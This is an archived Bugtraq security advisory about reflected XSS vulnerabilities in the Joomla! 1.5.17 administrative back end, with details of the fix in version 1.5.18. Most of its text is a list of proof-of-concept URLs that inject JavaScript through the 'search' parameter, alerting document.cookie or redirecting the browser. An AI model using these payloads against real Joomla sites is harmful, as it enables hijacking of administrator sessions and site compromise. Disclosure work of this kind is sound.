Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b1a-1188.htm

Joomla! Multiple XSS Vulnerabilities in Back End Administrative Module Core Components



- Core - Joomla! Multiple XSS Vulnerabilities in Back End Administrative Module Core Components
- Core - Joomla! Multiple XSS Vulnerabilities in Back End Administrative Module Core Components



Hi Bugtraq,

This is regarding multiple XSS vulnerabilities in multiple core
components of the administrative section of Joomla!

* Project: Joomla!
* SubProject: All
* Severity: High
* Versions: 1.5.17 and all previous 1.5 releases
* Exploit type: XSS Injection
* Reported Date: 2010-May-13
* Fixed Date: 2010-May-28
* Fixed Version: Joomla! 1.5.18
* Update Download Link: http://www.joomla.org/download.html 
* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html 

Vulnerability Details:

User can execute arbitrary JavaScript code within the vulnerable application.


The vulnerability arises due to the administrator core components
failing to properly sanitize user-supplied input in the "search"
variable. Successful exploitation of this vulnerability could result
in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection,
disclosure or modification of sensitive data and phishing attacks.


An attacker can send a link with the exploit to an administrator whose
access could compromise the application. The following PoC is
available:


http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 
http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E 


http://joomlasite/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_categories§ion=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_categories§ion=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_categories§ion=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_categories§ion=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 



http://joomlasite/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E 

Regards,
Riyaz Ahemed Walikar


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH